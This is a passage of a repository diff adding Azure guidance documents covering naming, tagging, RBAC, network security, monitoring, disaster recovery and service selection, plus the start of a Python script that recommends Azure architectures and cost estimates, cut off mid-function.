- Implement retry policies with exponential backoff (Polly for .NET, tenacity for Python)
- Define RPO/RTO and test disaster recovery quarterly
- Use Azure Chaos Studio for fault injection testing
### Security
- Entra ID for all human and service authentication
- Managed Identity for all Azure service-to-service communication
- Key Vault for secrets, certificates, and encryption keys — no secrets in code or config
- Private Endpoints for all PaaS services in production
- Microsoft Defender for Cloud for threat detection and compliance
### Cost Optimization
- Use serverless and consumption-based services where possible
- Auto-pause Azure SQL in dev/test (serverless tier)
- Spot VMs for fault-tolerant AKS node pools
- Reserved Instances for steady-state production workloads (1-year = 35% savings)
- Azure Advisor cost recommendations — review weekly
- Set budgets and alerts at subscription and resource group level
### Operational Excellence
- Bicep for all infrastructure (no manual portal deployments)
- GitOps for AKS (Flux or ArgoCD)
- Deployment slots or blue-green for zero-downtime deploys
- Centralized logging in Log Analytics with standardized KQL queries
- Azure DevOps or GitHub Actions for CI/CD with workload identity federation
### Performance Efficiency
- Application Insights for distributed tracing and performance profiling
- Azure Cache for Redis for session state and hot-path caching
- Front Door for edge caching and global acceleration
- Autoscale rules on compute (CPU, memory, HTTP queue length)
- Load testing with Azure Load Testing before production launch

View File

@@ -0,0 +1,337 @@
# Azure Best Practices
Production-ready practices for naming, tagging, security, networking, monitoring, and disaster recovery on Azure.
---
## Table of Contents
- [Naming Conventions](#naming-conventions)
- [Tagging Strategy](#tagging-strategy)
- [RBAC and Least Privilege](#rbac-and-least-privilege)
- [Network Security](#network-security)
- [Monitoring and Alerting](#monitoring-and-alerting)
- [Disaster Recovery](#disaster-recovery)
- [Common Pitfalls](#common-pitfalls)
---
## Naming Conventions
Follow the Azure Cloud Adoption Framework (CAF) naming convention for consistency and automation.
### Format
```
<resource-type>-<workload>-<environment>-<region>-<instance>
```
### Examples
| Resource | Naming Pattern | Example |
|----------|---------------|---------|
| Resource Group | rg-\<workload\>-\<env\> | rg-myapp-prod |
| App Service | app-\<workload\>-\<env\> | app-myapp-prod |
| App Service Plan | plan-\<workload\>-\<env\> | plan-myapp-prod |
| Azure SQL Server | sql-\<workload\>-\<env\> | sql-myapp-prod |
| Azure SQL Database | sqldb-\<workload\>-\<env\> | sqldb-myapp-prod |
| Storage Account | st\<workload\>\<env\> (no hyphens) | stmyappprod |
| Key Vault | kv-\<workload\>-\<env\> | kv-myapp-prod |
| AKS Cluster | aks-\<workload\>-\<env\> | aks-myapp-prod |
| Container Registry | cr\<workload\>\<env\> (no hyphens) | crmyappprod |
| Virtual Network | vnet-\<workload\>-\<env\> | vnet-myapp-prod |
| Subnet | snet-\<purpose\> | snet-app, snet-data |
| NSG | nsg-\<subnet-name\> | nsg-snet-app |
| Public IP | pip-\<resource\>-\<env\> | pip-agw-prod |
| Cosmos DB | cosmos-\<workload\>-\<env\> | cosmos-myapp-prod |
| Service Bus | sb-\<workload\>-\<env\> | sb-myapp-prod |
| Event Hubs | evh-\<workload\>-\<env\> | evh-myapp-prod |
| Log Analytics | log-\<workload\>-\<env\> | log-myapp-prod |
| Application Insights | ai-\<workload\>-\<env\> | ai-myapp-prod |
### Rules
- Lowercase only (some resources require it — be consistent everywhere)
- Hyphens as separators (except where disallowed: storage accounts, container registries)
- No longer than the resource type max length (e.g., storage accounts max 24 characters)
- Environment abbreviations: `dev`, `stg`, `prod`
- Region abbreviations: `eus` (East US), `weu` (West Europe), `sea` (Southeast Asia)
---
## Tagging Strategy
Tags enable cost allocation, ownership tracking, and automation. Apply to every resource.
### Required Tags
| Tag Key | Purpose | Example Values |
|---------|---------|---------------|
| environment | Cost splitting, policy targeting | dev, staging, production |
| app-name | Workload identification | myapp, data-pipeline |
| owner | Team or individual responsible | platform-team, jane.doe@company.com |
| cost-center | Finance allocation | CC-1234, engineering |
### Recommended Tags
| Tag Key | Purpose | Example Values |
|---------|---------|---------------|
| created-by | IaC or manual tracking | bicep, terraform, portal |
| data-classification | Security posture | public, internal, confidential |
| compliance | Regulatory requirements | hipaa, gdpr, sox |
| auto-shutdown | Dev/test cost savings | true, false |
### Enforcement
Use Azure Policy to enforce tagging:
```json
{
"if": {
"allOf": [
{ "field": "tags['environment']", "exists": "false" },
{ "field": "type", "notEquals": "Microsoft.Resources/subscriptions/resourceGroups" }
]
},
"then": { "effect": "deny" }
}
```
---
## RBAC and Least Privilege
### Principles
1. **Use built-in roles** before creating custom roles
2. **Assign roles to groups**, not individual users
3. **Scope to the narrowest level** — resource group or resource, not subscription
4. **Use Managed Identity** for service-to-service — never store credentials
5. **Enable Entra ID PIM** (Privileged Identity Management) for just-in-time admin access
### Common Role Assignments
| Persona | Scope | Role |
|---------|-------|------|
| Developer | Resource Group (dev) | Contributor |
| Developer | Resource Group (prod) | Reader |
| CI/CD pipeline | Resource Group | Contributor (via workload identity) |
| App Service | Key Vault | Key Vault Secrets User |
| App Service | Azure SQL | SQL DB Contributor (or Entra auth) |
| AKS pod | Cosmos DB | Cosmos DB Built-in Data Contributor |
| Security team | Subscription | Security Reader |
| Platform team | Subscription | Owner (with PIM) |
### Workload Identity Federation
For CI/CD pipelines (GitHub Actions, Azure DevOps), use workload identity federation instead of service principal secrets:
```bash
# Create federated credential (GitHub Actions example)
az ad app federated-credential create \
--id <app-object-id> \
--parameters '{
"name": "github-main",
"issuer": "https://token.actions.githubusercontent.com",
"subject": "repo:org/repo:ref:refs/heads/main",
"audiences": ["api://AzureADTokenExchange"]
}'
```
---
## Network Security
### Defense in Depth
| Layer | Control | Implementation |
|-------|---------|---------------|
| Edge | DDoS + WAF | Azure DDoS Protection + Front Door WAF |
| Perimeter | Firewall | Azure Firewall or NVA for hub VNet |
| Network | Segmentation | VNet + subnets + NSGs |
| Application | Access control | Private Endpoints + Managed Identity |
| Data | Encryption | TLS 1.2+ in transit, CMK at rest |
### Private Endpoints
Every PaaS service in production must use Private Endpoints:
| Service | Private Endpoint Support | Private DNS Zone |
|---------|------------------------|------------------|
| Azure SQL | Yes | privatelink.database.windows.net |
| Cosmos DB | Yes | privatelink.documents.azure.com |
| Key Vault | Yes | privatelink.vaultcore.azure.net |
| Storage (Blob) | Yes | privatelink.blob.core.windows.net |
| Container Registry | Yes | privatelink.azurecr.io |
| Service Bus | Yes | privatelink.servicebus.windows.net |
| App Service | VNet Integration (outbound) + Private Endpoint (inbound) | privatelink.azurewebsites.net |
### NSG Rules Baseline
Every subnet should have an NSG. Start with deny-all inbound, then open only what is needed:
```
Priority Direction Action Source Destination Port
100 Inbound Allow Front Door App Subnet 443
200 Inbound Allow App Subnet Data Subnet 1433,5432
300 Inbound Allow VNet VNet Any (internal)
4096 Inbound Deny Any Any Any
```
### Application Gateway + WAF
For single-region web apps without Front Door:
- Application Gateway v2 with WAF enabled
- OWASP 3.2 rule set + custom rules
- Rate limiting per client IP
- Bot protection (managed rule set)
- SSL termination with Key Vault certificate
---
## Monitoring and Alerting
### Monitoring Stack
```
Application Insights (APM + distributed tracing)
Log Analytics Workspace (central log store)
Azure Monitor Alerts (metric + log-based)
Action Groups (email, Teams, PagerDuty, webhook)
```
### Essential Alerts
| Alert | Condition | Severity |
|-------|-----------|----------|
| App Service HTTP 5xx | > 10 in 5 minutes | Critical (Sev 1) |
| App Service response time | P95 > 2 seconds | Warning (Sev 2) |
| Azure SQL DTU/CPU | > 80% for 10 minutes | Warning (Sev 2) |
| Azure SQL deadlocks | > 0 | Warning (Sev 2) |
| Cosmos DB throttled requests | 429 count > 10 in 5 min | Warning (Sev 2) |
| AKS node CPU | > 80% for 10 minutes | Warning (Sev 2) |
| AKS pod restart count | > 5 in 10 minutes | Critical (Sev 1) |
| Key Vault access denied | > 0 | Critical (Sev 1) |
| Budget threshold | 80% of monthly budget | Warning (Sev 3) |
| Budget threshold | 100% of monthly budget | Critical (Sev 1) |
### KQL Queries for Troubleshooting
**App Service slow requests:**
```kql
requests
| where duration > 2000
| summarize count(), avg(duration), percentile(duration, 95) by name
| order by count_ desc
| take 10
```
**Failed dependencies (SQL, HTTP, etc.):**
```kql
dependencies
| where success == false
| summarize count() by type, target, resultCode
| order by count_ desc
```
**AKS pod errors:**
```kql
KubePodInventory
| where PodStatus != "Running" and PodStatus != "Succeeded"
| summarize count() by PodStatus, Namespace, Name
| order by count_ desc
```
### Application Insights Configuration
- Enable **distributed tracing** with W3C trace context
- Set **sampling** to 5-10% for high-volume production (100% for dev)
- Enable **profiler** for .NET applications
- Enable **snapshot debugger** for exception analysis
- Configure **availability tests** (URL ping every 5 minutes from multiple regions)
---
## Disaster Recovery
### RPO/RTO Mapping
| Tier | RPO | RTO | Strategy | Cost |
|------|-----|-----|----------|------|
| Tier 1 (critical) | < 5 minutes | < 1 hour | Active-active multi-region | 2x |
| Tier 2 (important) | < 1 hour | < 4 hours | Warm standby | 1.3x |
| Tier 3 (standard) | < 24 hours | < 24 hours | Backup and restore | 1.1x |
| Tier 4 (non-critical) | < 72 hours | < 72 hours | Rebuild from IaC | 1x |
### Backup Strategy
| Service | Backup Method | Retention |
|---------|--------------|-----------|
| Azure SQL | Automated backups | 7 days (short-term), 10 years (long-term) |
| Cosmos DB | Continuous backup + point-in-time restore | 7-30 days |
| Blob Storage | Soft delete + versioning + geo-redundant | 30 days soft delete |
| AKS | Velero backup to Blob Storage | 7 days |
| Key Vault | Soft delete + purge protection | 90 days |
| App Service | Manual or automated (Backup and Restore feature) | Custom |
### Storage Redundancy
| Redundancy | Regions | Durability | Use Case |
|-----------|---------|-----------|----------|
| LRS | 1 (3 copies) | 11 nines | Dev/test, easily recreatable data |
| ZRS | 1 (3 AZs) | 12 nines | Production, zone failure protection |
| GRS | 2 (6 copies) | 16 nines | Business-critical, regional failure protection |
| GZRS | 2 (3 AZs + secondary) | 16 nines | Most critical data, best protection |
**Default to ZRS for production.** Use GRS/GZRS only when cross-region DR is required.
### DR Testing Checklist
- [ ] Verify automated backups are running and retention is correct
- [ ] Test point-in-time restore for databases (monthly)
- [ ] Test regional failover for SQL failover groups (quarterly)
- [ ] Validate IaC can recreate full environment from scratch
- [ ] Test Front Door failover by taking down primary region health endpoint
- [ ] Document and test runbook for manual failover steps
- [ ] Measure actual RTO vs target during DR drill
---
## Common Pitfalls
### Cost Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| No budget alerts | Unexpected bills | Set alerts at 50%, 80%, 100% on day one |
| Premium tier in dev/test | 3-5x overspend | Use Basic/Free tiers, auto-shutdown VMs |
| Orphaned resources | Silent monthly charges | Tag everything, review Cost Management weekly |
| Ignoring Reserved Instances | 35-55% overpay on steady workloads | Review Azure Advisor quarterly |
| Over-provisioned Cosmos DB RU/s | Paying for unused throughput | Use autoscale or serverless |
### Security Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Secrets in App Settings | Leaked credentials | Use Key Vault references |
| Public PaaS endpoints | Exposed attack surface | Private Endpoints + VNet integration |
| Contributor role on subscription | Overprivileged access | Scope to resource group, use PIM |
| No diagnostic settings | Blind to attacks | Enable on every resource from day one |
| SQL password authentication | Weak identity model | Entra-only auth, Managed Identity |
### Operational Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Manual portal deployments | Drift, no audit trail | Bicep for everything, block portal changes via Policy |
| No health checks configured | Silent failures | /health endpoint, Front Door probes, App Service checks |
| Single region deployment | Single point of failure | At minimum, use Availability Zones |
| No tagging strategy | Cannot track costs/ownership | Enforce via Azure Policy from day one |
| Ignoring Azure Advisor | Missed optimizations | Weekly review, enable email digest |

View File

@@ -0,0 +1,250 @@
# Azure Service Selection Guide
Quick reference for choosing the right Azure service based on workload requirements.
---
## Table of Contents
- [Compute Services](#compute-services)
- [Database Services](#database-services)
- [Storage Services](#storage-services)
- [Messaging and Events](#messaging-and-events)
- [Networking](#networking)
- [Security and Identity](#security-and-identity)
- [Monitoring and Observability](#monitoring-and-observability)
---
## Compute Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Event-driven, short tasks (<10 min) | Azure Functions (Consumption) |
| Event-driven, longer tasks (<30 min) | Azure Functions (Premium) |
| Containerized apps, simple deployment | Azure Container Apps |
| Full Kubernetes control | AKS |
| Traditional web apps (PaaS) | App Service |
| GPU, HPC, custom OS | Virtual Machines |
| Batch processing | Azure Batch |
| Simple container from source | App Service (container) |
### Azure Functions vs Container Apps vs AKS vs App Service
| Feature | Functions | Container Apps | AKS | App Service |
|---------|-----------|---------------|-----|-------------|
| Scale to zero | Yes (Consumption) | Yes | No (min 1 node) | No |
| Kubernetes | No | Built on K8s (abstracted) | Full K8s | No |
| Cold start | 1-5s (Consumption) | 0-2s | N/A | N/A |
| Max execution time | 10 min (Consumption), 30 min (Premium) | Unlimited | Unlimited | Unlimited |
| Languages | C#, JS, Python, Java, Go, Rust, PowerShell | Any container | Any container | .NET, Node, Python, Java, PHP, Ruby |
| Pricing model | Per-execution | Per vCPU-second | Per node | Per plan |
| Best for | Event handlers, APIs, scheduled jobs | Microservices, APIs | Complex platforms, multi-team | Web apps, APIs, mobile backends |
| Operational complexity | Low | Low-Medium | High | Low |
| Dapr integration | No | Built-in | Manual | No |
| KEDA autoscaling | No | Built-in | Manual install | No |
**Opinionated recommendation:**
- **Start with App Service** for web apps and APIs — simplest operational model.
- **Use Container Apps** for microservices — serverless containers without Kubernetes complexity.
- **Use AKS** only when you need full Kubernetes API access (custom operators, service mesh, multi-cluster).
- **Use Functions** for event-driven glue (queue processing, webhooks, scheduled jobs).
### VM Size Selection
| Workload | Series | Example | vCPUs | RAM | Use Case |
|----------|--------|---------|-------|-----|----------|
| General purpose | Dv5/Dsv5 | Standard_D4s_v5 | 4 | 16 GB | Web servers, small databases |
| Memory optimized | Ev5/Esv5 | Standard_E8s_v5 | 8 | 64 GB | Databases, caching, analytics |
| Compute optimized | Fv2/Fsv2 | Standard_F8s_v2 | 8 | 16 GB | Batch processing, ML inference |
| Storage optimized | Lsv3 | Standard_L8s_v3 | 8 | 64 GB | Data warehouses, large databases |
| GPU | NCv3/NDv4 | Standard_NC6s_v3 | 6 | 112 GB | ML training, rendering |
**Always use v5 generation or newer** — better price-performance than older series.
---
## Database Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Relational, SQL Server compatible | Azure SQL Database |
| Relational, PostgreSQL | Azure Database for PostgreSQL Flexible Server |
| Relational, MySQL | Azure Database for MySQL Flexible Server |
| Document / multi-model, global distribution | Cosmos DB |
| Key-value cache, sessions | Azure Cache for Redis |
| Time-series, IoT data | Azure Data Explorer (Kusto) |
| Full-text search | Azure AI Search (formerly Cognitive Search) |
| Graph database | Cosmos DB (Gremlin API) |
### Cosmos DB vs Azure SQL vs PostgreSQL
| Feature | Cosmos DB | Azure SQL | PostgreSQL Flexible |
|---------|-----------|-----------|-------------------|
| Data model | Document, key-value, graph, table, column | Relational | Relational + JSON |
| Global distribution | Native multi-region writes | Geo-replication (async) | Read replicas |
| Consistency | 5 levels (strong to eventual) | Strong | Strong |
| Scaling | RU/s (auto or manual) | DTU or vCore | vCore |
| Serverless tier | Yes | Yes | No |
| Best for | Global apps, variable schema, low-latency reads | OLTP, complex queries, transactions | PostgreSQL ecosystem, extensions |
| Pricing model | Per RU/s + storage | Per DTU or per vCore | Per vCore |
| Managed backups | Continuous + point-in-time | Automatic + long-term retention | Automatic |
**Opinionated recommendation:**
- **Default to Azure SQL Serverless** for most relational workloads — auto-pause saves money in dev/staging.
- **Use PostgreSQL Flexible** when you need PostGIS, full-text search, or specific PostgreSQL extensions.
- **Use Cosmos DB** only when you need global distribution, sub-10ms latency, or flexible schema.
- **Never use Cosmos DB** for workloads that need complex joins or transactions across partitions.
### Azure SQL Tier Selection
| Tier | Use Case | Compute | Cost Range |
|------|----------|---------|------------|
| Basic / S0 | Dev/test, tiny workloads | 5 DTUs | $5/month |
| General Purpose (Serverless) | Variable workloads, dev/staging | 0.5-40 vCores (auto-pause) | $40-800/month |
| General Purpose (Provisioned) | Steady production workloads | 2-80 vCores | $150-3000/month |
| Business Critical | High IOPS, low latency, readable secondary | 2-128 vCores | $400-8000/month |
| Hyperscale | Large databases (>4 TB), instant scaling | 2-128 vCores | $200-5000/month |
---
## Storage Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Unstructured data (files, images, backups) | Blob Storage |
| File shares (SMB/NFS) | Azure Files |
| High-performance file shares | Azure NetApp Files |
| Data Lake (analytics, big data) | Data Lake Storage Gen2 |
| Disk storage for VMs | Managed Disks |
| Queue-based messaging (simple) | Queue Storage |
| Table data (simple key-value) | Table Storage (or Cosmos DB Table API) |
### Blob Storage Tiers
| Tier | Access Pattern | Cost (per GB/month) | Access Cost | Use Case |
|------|---------------|---------------------|-------------|----------|
| Hot | Frequent access | $0.018 | Low | Active data, web content |
| Cool | Infrequent (30+ days) | $0.01 | Medium | Backups, older data |
| Cold | Rarely accessed (90+ days) | $0.0036 | Higher | Compliance archives |
| Archive | Almost never (180+ days) | $0.00099 | High (rehydrate required) | Long-term retention |
**Always set lifecycle management policies.** Rule of thumb: Hot for 30 days, Cool for 90 days, Cold or Archive after that.
---
## Messaging and Events
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Pub/sub, event routing, reactive | Event Grid |
| Reliable message queues, transactions | Service Bus |
| High-throughput event streaming | Event Hubs |
| Simple task queues | Queue Storage |
| IoT device telemetry | IoT Hub |
### Event Grid vs Service Bus vs Event Hubs
| Feature | Event Grid | Service Bus | Event Hubs |
|---------|-----------|-------------|------------|
| Pattern | Pub/Sub events | Message queue / topic | Event streaming |
| Delivery | At-least-once | At-least-once (peek-lock) | At-least-once (partitioned) |
| Ordering | No guarantee | FIFO (sessions) | Per partition |
| Max message size | 1 MB | 256 KB (Standard), 100 MB (Premium) | 1 MB (Standard), 20 MB (Premium) |
| Retention | 24 hours | 14 days (Standard) | 1-90 days |
| Throughput | Millions/sec | Thousands/sec | Millions/sec |
| Best for | Reactive events, webhooks | Business workflows, commands | Telemetry, logs, analytics |
| Dead letter | Yes | Yes | Via capture to storage |
**Opinionated recommendation:**
- **Event Grid** for reactive, fan-out scenarios (blob uploaded, resource created, custom events).
- **Service Bus** for reliable business messaging (orders, payments, workflows). Use topics for pub/sub, queues for point-to-point.
- **Event Hubs** for high-volume telemetry, log aggregation, and streaming analytics.
---
## Networking
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Global HTTP load balancing + CDN + WAF | Azure Front Door |
| Regional Layer 7 load balancing + WAF | Application Gateway |
| Regional Layer 4 load balancing | Azure Load Balancer |
| DNS management | Azure DNS |
| DNS-based global traffic routing | Traffic Manager |
| Private connectivity to PaaS | Private Endpoints |
| Site-to-site VPN | VPN Gateway |
| Dedicated private connection | ExpressRoute |
| Outbound internet from VNet | NAT Gateway |
| DDoS protection | Azure DDoS Protection |
### Front Door vs Application Gateway vs Load Balancer
| Feature | Front Door | Application Gateway | Load Balancer |
|---------|-----------|-------------------|--------------|
| Layer | 7 (HTTP/HTTPS) | 7 (HTTP/HTTPS) | 4 (TCP/UDP) |
| Scope | Global | Regional | Regional |
| WAF | Yes (Premium) | Yes (v2) | No |
| SSL termination | Yes | Yes | No |
| CDN | Built-in | No | No |
| Health probes | Yes | Yes | Yes |
| Best for | Global web apps, multi-region | Single-region web apps | TCP/UDP workloads, internal LB |
---
## Security and Identity
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| User authentication | Entra ID (Azure AD) |
| B2C customer identity | Entra External ID (Azure AD B2C) |
| Secrets, keys, certificates | Key Vault |
| Service-to-service auth | Managed Identity |
| Network access control | NSGs + Private Endpoints |
| Web application firewall | Front Door WAF or App Gateway WAF |
| Threat detection | Microsoft Defender for Cloud |
| Policy enforcement | Azure Policy |
| Privileged access management | Entra ID PIM |
### Managed Identity Usage
| Scenario | Configuration |
|----------|---------------|
| App Service accessing SQL | System-assigned MI + Azure SQL Entra auth |
| Functions accessing Key Vault | System-assigned MI + Key Vault RBAC |
| AKS pods accessing Cosmos DB | Workload Identity + Cosmos DB RBAC |
| VM accessing Storage | System-assigned MI + Storage RBAC |
| DevOps pipeline deploying | Workload Identity Federation (no secrets) |
**Rule: Every Azure service that supports Managed Identity should use it.** No connection strings with passwords, no service principal secrets in config.
---
## Monitoring and Observability
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| Application performance monitoring | Application Insights |
| Log aggregation and queries | Log Analytics (KQL) |
| Metrics and alerts | Azure Monitor |
| Dashboards | Azure Dashboard or Grafana (managed) |
| Distributed tracing | Application Insights (OpenTelemetry) |
| Cost monitoring | Cost Management + Budgets |
| Security monitoring | Microsoft Defender for Cloud |
| Compliance monitoring | Azure Policy + Regulatory Compliance |
**Every resource should have diagnostic settings** sending logs and metrics to a Log Analytics workspace. Non-negotiable for production.

View File

@@ -0,0 +1,592 @@
#!/usr/bin/env python3
"""
Azure architecture design and service recommendation tool.
Generates architecture patterns based on application requirements.
Usage:
python architecture_designer.py --app-type web_app --users 10000
python architecture_designer.py --app-type microservices --users 50000 --requirements '{"compliance": ["HIPAA"]}'
python architecture_designer.py --app-type serverless --users 5000 --json
"""
import argparse
import json
import sys
from typing import Dict, List, Any
# ---------------------------------------------------------------------------
# Azure service catalog used by the designer
# ---------------------------------------------------------------------------
ARCHITECTURE_PATTERNS = {
"web_app": {
"small": "app_service_web",
"medium": "app_service_scaled",
"large": "multi_region_web",
},
"saas_platform": {
"small": "app_service_web",
"medium": "aks_microservices",
"large": "multi_region_web",
},
"mobile_backend": {
"small": "serverless_functions",
"medium": "app_service_web",
"large": "aks_microservices",
},
"microservices": {
"small": "container_apps",
"medium": "aks_microservices",
"large": "aks_microservices",
},
"data_pipeline": {
"small": "serverless_data",
"medium": "synapse_pipeline",
"large": "synapse_pipeline",
},
"serverless": {
"small": "serverless_functions",
"medium": "serverless_functions",
"large": "serverless_functions",
},
}
def _size_bucket(users: int) -> str:
if users < 10000:
return "small"
if users < 100000:
return "medium"
return "large"
# ---------------------------------------------------------------------------
# Pattern builders
# ---------------------------------------------------------------------------
def _app_service_web(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 500)
return {
"recommended_pattern": "app_service_web",
"description": "Azure App Service with managed SQL and CDN",
"use_case": "Web apps, SaaS platforms, startup MVPs",
"service_stack": [
"App Service (Linux P1v3)",
"Azure SQL Database (Serverless GP_S_Gen5_2)",
"Azure Front Door",
"Azure Blob Storage",
"Key Vault",
"Entra ID + RBAC",
"Application Insights",
],
"estimated_monthly_cost_usd": min(280, budget),
"cost_breakdown": {
"App Service P1v3": "$70-95",
"Azure SQL Serverless": "$40-120",
"Front Door": "$35-55",
"Blob Storage": "$5-15",
"Key Vault": "$1-5",
"Application Insights": "$5-20",
},
"pros": [
"Managed platform — no OS patching",
"Built-in autoscale and deployment slots",
"Easy CI/CD with GitHub Actions or Azure DevOps",
"Custom domains and TLS certificates included",
"Integrated authentication (Easy Auth)",
],
"cons": [
"Less control than VMs or containers",
"Platform constraints for exotic runtimes",
"Cold start on lower-tier plans",
"Outbound IP shared unless isolated tier",
],
"scaling": {
"users_supported": "1k - 100k",
"requests_per_second": "100 - 10,000",
"method": "App Service autoscale rules (CPU, memory, HTTP queue)",
},
}
def _aks_microservices(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 2000)
return {
"recommended_pattern": "aks_microservices",
"description": "Microservices on AKS with API Management and Cosmos DB",
"use_case": "Complex SaaS, multi-team microservices, high-scale platforms",
"service_stack": [
"AKS (3 node pools: system, app, jobs)",
"API Management (Standard v2)",
"Cosmos DB (multi-model)",
"Service Bus (Standard)",
"Azure Container Registry",
"Azure Monitor + Application Insights",
"Key Vault",
"Entra ID workload identity",
],
"estimated_monthly_cost_usd": min(1200, budget),
"cost_breakdown": {
"AKS node pools (D4s_v5 x3)": "$350-500",
"API Management Standard v2": "$175",
"Cosmos DB": "$100-400",
"Service Bus Standard": "$10-50",
"Container Registry Basic": "$5",
"Azure Monitor": "$50-100",
"Key Vault": "$1-5",
},
"pros": [
"Full Kubernetes ecosystem",
"Independent scaling per service",
"Multi-language and multi-framework",
"Mature ecosystem (Helm, Keda, Dapr)",
"Workload identity — no credentials in pods",
],
"cons": [
"Kubernetes operational complexity",
"Higher baseline cost",
"Requires dedicated platform team",
"Networking (CNI, ingress) configuration heavy",
],
"scaling": {
"users_supported": "10k - 10M",
"requests_per_second": "1,000 - 1,000,000",
"method": "Cluster autoscaler + KEDA event-driven autoscaling",
},
}
def _container_apps(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 500)
return {
"recommended_pattern": "container_apps",
"description": "Serverless containers on Azure Container Apps",
"use_case": "Microservices without Kubernetes management overhead",
"service_stack": [
"Azure Container Apps",
"Azure Container Registry",
"Cosmos DB",
"Service Bus",
"Key Vault",
"Application Insights",
"Entra ID managed identity",
],
"estimated_monthly_cost_usd": min(350, budget),
"cost_breakdown": {
"Container Apps (consumption)": "$50-150",
"Container Registry Basic": "$5",
"Cosmos DB": "$50-150",
"Service Bus Standard": "$10-30",
"Key Vault": "$1-5",
"Application Insights": "$5-20",
},
"pros": [
"Serverless containers — scale to zero",
"Built-in Dapr integration",
"KEDA autoscaling included",
"No cluster management",
"Simpler networking than AKS",
],
"cons": [
"Less control than full AKS",
"Limited to HTTP and event-driven workloads",
"Smaller ecosystem than Kubernetes",
"Some advanced features still in preview",
],
"scaling": {
"users_supported": "1k - 500k",
"requests_per_second": "100 - 50,000",
"method": "KEDA scalers (HTTP, queue length, CPU, custom)",
},
}
def _serverless_functions(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 300)
return {
"recommended_pattern": "serverless_functions",
"description": "Azure Functions with Event Grid and Cosmos DB",
"use_case": "Event-driven backends, APIs, scheduled jobs, webhooks",
"service_stack": [
"Azure Functions (Consumption plan)",
"Event Grid",
"Service Bus",
"Cosmos DB (Serverless)",
"Azure Blob Storage",
"Application Insights",
"Key Vault",
],
"estimated_monthly_cost_usd": min(80, budget),
"cost_breakdown": {
"Functions (Consumption)": "$0-20 (1M free executions/month)",
"Event Grid": "$0-5",
"Service Bus Basic": "$0-10",
"Cosmos DB Serverless": "$5-40",
"Blob Storage": "$2-10",
"Application Insights": "$5-15",
},
"pros": [
"Pay-per-execution — true serverless",
"Scale to zero, scale to millions",
"Multiple trigger types (HTTP, queue, timer, blob, event)",
"Durable Functions for orchestration",
"Fast development cycle",
],
"cons": [
"Cold start latency (1-5s on consumption plan)",
"10-minute execution timeout on consumption plan",
"Limited local development experience",
"Debugging distributed functions is complex",
],
"scaling": {
"users_supported": "1k - 1M",
"requests_per_second": "100 - 100,000",
"method": "Automatic (Azure Functions runtime scales instances)",
},
}
def _synapse_pipeline(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 1500)
return {
"recommended_pattern": "synapse_pipeline",
"description": "Data pipeline with Event Hubs, Synapse, and Data Lake",
"use_case": "Data warehousing, ETL, analytics, ML pipelines",
"service_stack": [
"Event Hubs (Standard)",
"Data Factory / Synapse Pipelines",
"Data Lake Storage Gen2",
"Synapse Analytics (Serverless SQL pool)",
"Azure Functions (processing)",
"Power BI",
"Azure Monitor",
],
"estimated_monthly_cost_usd": min(800, budget),
"cost_breakdown": {
"Event Hubs Standard": "$20-80",
"Data Factory": "$50-200",
"Data Lake Storage Gen2": "$20-80",
"Synapse Serverless SQL": "$50-300 (per TB scanned)",
"Azure Functions": "$10-40",
"Power BI Pro": "$10/user/month",
},
"pros": [
"Unified analytics platform (Synapse)",
"Serverless SQL — pay per query",
"Native Spark integration",
"Data Lake Gen2 — hierarchical namespace, cheap storage",
"Built-in data integration (90+ connectors)",
],
"cons": [
"Synapse learning curve",
"Cost unpredictable with serverless SQL at scale",
"Complex permissions model (Synapse RBAC + storage ACLs)",
"Spark pool startup time",
],
"scaling": {
"events_per_second": "1,000 - 10,000,000",
"data_volume": "1 GB - 1 PB per day",
"method": "Event Hubs throughput units + Synapse auto-scale",
},
}
def _serverless_data(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 300)
return {
"recommended_pattern": "serverless_data",
"description": "Lightweight data pipeline with Functions and Data Lake",
"use_case": "Small-scale ETL, event processing, log aggregation",
"service_stack": [
"Azure Functions",
"Event Grid",
"Data Lake Storage Gen2",
"Azure SQL Serverless",
"Application Insights",
],
"estimated_monthly_cost_usd": min(120, budget),
"cost_breakdown": {
"Azure Functions": "$0-20",
"Event Grid": "$0-5",
"Data Lake Storage Gen2": "$5-20",
"Azure SQL Serverless": "$20-60",
"Application Insights": "$5-15",
},
"pros": [
"Very low cost for small volumes",
"Serverless end-to-end",
"Simple to operate",
"Scales automatically",
],
"cons": [
"Not suitable for high-volume analytics",
"Limited transformation capabilities",
"No built-in orchestration (use Durable Functions)",
],
"scaling": {
"events_per_second": "10 - 10,000",
"data_volume": "1 MB - 100 GB per day",
"method": "Azure Functions auto-scale",
},
}
def _multi_region_web(users: int, reqs: Dict) -> Dict[str, Any]:
budget = reqs.get("budget_monthly_usd", 5000)
return {
"recommended_pattern": "multi_region_web",
"description": "Multi-region active-active deployment with Front Door",
"use_case": "Global applications, 99.99% uptime, data residency compliance",
"service_stack": [
"Azure Front Door (Premium)",
"App Service (2+ regions) or AKS (2+ regions)",
"Cosmos DB (multi-region writes)",
"Azure SQL (geo-replication or failover groups)",
"Traffic Manager (DNS failover)",
"Azure Monitor + Log Analytics (centralized)",
"Key Vault (per region)",
],
"estimated_monthly_cost_usd": min(3000, budget),
"cost_breakdown": {
"Front Door Premium": "$100-200",
"Compute (2 regions)": "$300-1000",
"Cosmos DB (multi-region)": "$400-1500",
"Azure SQL geo-replication": "$200-600",
"Monitoring": "$50-150",
